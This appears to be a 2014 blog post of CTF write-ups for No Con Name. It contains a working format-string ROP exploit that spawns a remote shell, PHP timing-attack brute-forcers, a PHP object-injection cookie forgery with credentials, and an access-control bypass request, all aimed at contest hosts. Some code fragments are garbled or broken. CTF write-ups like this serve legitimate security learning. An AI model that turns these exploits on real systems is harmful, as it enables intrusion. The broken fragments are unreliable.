Monday, September 15, 2014

inBINcible

inBINcible (solved by souhail)
Write-up

No Con Name

eXPLicit

eXPLicit (not solved) source
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *

REMOTE = 0

if REMOTE:
    host = '88.87.208.163'
    port = 7070
else:
    host = '127.0.0.1'
    port = 7070

def connect():
    return remote(host, port)

def retrieve_val(res):
    m = re.search('Your number is (.+) which is too low.', res)
    if m:
        leak = m.group(1)
        return leak
    else:
        return None

def dump_stack():
    for i in range(1, 100):
        payload = (
            "%%%d$x" % i +
            '\n'
        )
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            print buf
    s.interactive()

def send_fmt(payload):
    s.sendafter('Pick a number between 0 and 20: ', payload + '\n')

bss = 0x80d6080 + 0x100

int80 = 0x8082715  # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret

s = connect()

#dump_stack()

send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)

# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# dup2(4, 0)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x3f
p[retaddr+4*2] = popecx_ebx
p[retaddr+4*3] = 1
p[retaddr+4*4] = 0x4
p[retaddr+4*5] = int80
send_fmt(p.payload(6))
retaddr += 4*6

# execve("/bin/sh", ["/bin/sh", NULL], NULL)
p = FormatStr()
p[retaddr] = popeax
p[retaddr+4*1] = 0x0b
p[retaddr+4*2] = popedx_ecx_ebx
p[retaddr+4*3] = 0
p[retaddr+4*4] = bss+4*1
p[retaddr+4*5] = bss+4*3
p[retaddr+4*6] = int80
send_fmt(p.payload(6))

# ["/bin/sh", NULL]
p = FormatStr()
p[bss] = retaddr+4*1
p[bss+4*1] = bss+4*3
p[bss+4*2] = 0
p[bss+4*3] = '/bin'
p[bss+4*4] = '/sh\0'
send_fmt(p.payload(6))

s.interactive()


proMISCuous

proMISCuous (solved by kami)

   

 [".$morrey."]";
				$all[$char]=$morrey; //save all in array
		}

$cracked=array_search(max($all), $all); // $key = 2; compare max value
$final .=$cracked;// save max delai in one table

// echo  $final."\n"; Disable debugging

 unset($all);
}

$fp = fsockopen($host, $port);
fwrite($fp, $cracked);
echo $resultat = fgets($fp,80)."\n";


?>



tIMeMaTTerS
NcN_15d07db12cd83174f0d19ce7e8c65a7c5ffba7df Another exploit :
$val){  
                $sock = fsockopen("88.87.208.163", "6969");  
                $start =microtime(true);  
                fwrite($sock, $str.$val."\n");  
                $result=fgets($sock,1080);  
                $end  =microtime(true);  
                $arr[]=($end-$start);  
           }  
           $str.=$char[array_search(max($arr), $arr)];  
           echo $char[array_search(max($arr), $arr)];  
      }  
 ?>  

STEGOsaurus

http://en.wikipedia.org/wiki/Hearing_range#Humans

human hearing is 20 Hz to 20 kHz

i try remove voice using audacity

audacity effect vocal remover fixer les frequence entre 20 et 20000  et Removal choice : Remove Frequence band
after morse to ascii manuel

WEBster

WEBster (solved by kami)

log as test/test
Bypass  Permission Controle  using loc=md5(127.0.0.1)

GET https://ctf.noconname.org/webster/content.php?op=4 HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/webster/
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9jmjodd20igc7svk7inmo350k4; loc=f528764d624db129b32c21fbca0cb8d6
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Crypto spanish-book

Crypto (solved by kami)

file = open('spanish-book.enc', 'r')
content = file.read()

List1=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",",","_","!",".","-",")","(",";","?",":"]
        List2=["b","s","a","d","x","F","g","H","n","J","K","l","t","m","O","u","c","d","s","T","i","V","W",",","Y","Z","q","e","o","p","g","r","(","v","f","b"]

for (x,y) in zip(List1,List2):
    content.replace(x,y)
print content


pareciendole que aquella era propia desgracia de caballeros
andantesA g toda la atribuia a la falta de su caballod g no era
posible levantarseA segun tenia abrumado todo el cuerpos


     capitulo quinto

     donde se prosigue la narracion de la desgracia de nuestro
caballero

ncnJdeadbeafcafebadbabefeeddefacedbedfadedecviendoA puesA que en
efecto no podia menearseA acordo de acogerse a su ordinario
remedioA que era pensar en algun paso de sus librosA g traVole
su colera a la memoria aquel de baldovinos g del marques de


 https://gist.github.com/rekkusu/47e369c3f74342970c31

MakeMeFeeWet^Hb

Makemefeelweb( solved by kami)

GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Hint comment found in top of the page : (Emac config)

<!-- vim: set ts=2 sw=2: -->  <== @ HINT@already check it i think it means tabstop=2 and shiftwidth=2

 tab width and code indent width.



<html>
<head>
        <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
        <script src="assets/jquery-1.11.1.min.js"></script>
        <script src="assets/bootstrap/js/bootstrap.min.js"></script>
        <title>WUT</title>
</head>
t's emac vuln

here a incomplete backup https://ctf.noconname.org/makemefeelweb/.login.php.swp

@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));

           if (isset($_COOKIE['JSESSIONID'])) {        
        if ($username == "p00p" && $password == "l!k34b4u5") {           }                 }              
        $this->p = $_passwd;                 $this->u = $_uname;              
     

     
        class Creds {
        public function __construct($_uname, $_passwd) {
        public $p;
        public $u;

Exploit :

class Creds {public $p = true;public        $u = true;}
$exploit=new creds;echo base64_encode(bin2hex(serialize($exploit)));


POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5

NcN_7780*************************eba1578

MISCall

MISCall (solved by kami)

I deploy the git, then it's applying the changes to be committed (we get a s.py)

# git stash pop

# On branch master
# Changes to be committed:
#   (use "git reset HEAD <file>..." to unstage)
#
#       new file:   s.py
#
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#       modified:   flag.txt
#
Dropped refs/stash@{0} (1f824bb78af66d27d88d6b0de8a58e975061665e)
# ls
flag.txt  s.py
root@ks3283938:/var/www/kami.ma/web/ctf# cat s.py
#!/usr/bin/env python
from hashlib import sha1
with open("flag.txt", "rb") as fd:
    print "NCN" + sha1(fd.read()).hexdigest()

python s.py
NCN4dd992213ae6b76f27d7340f0dde1222888df4d3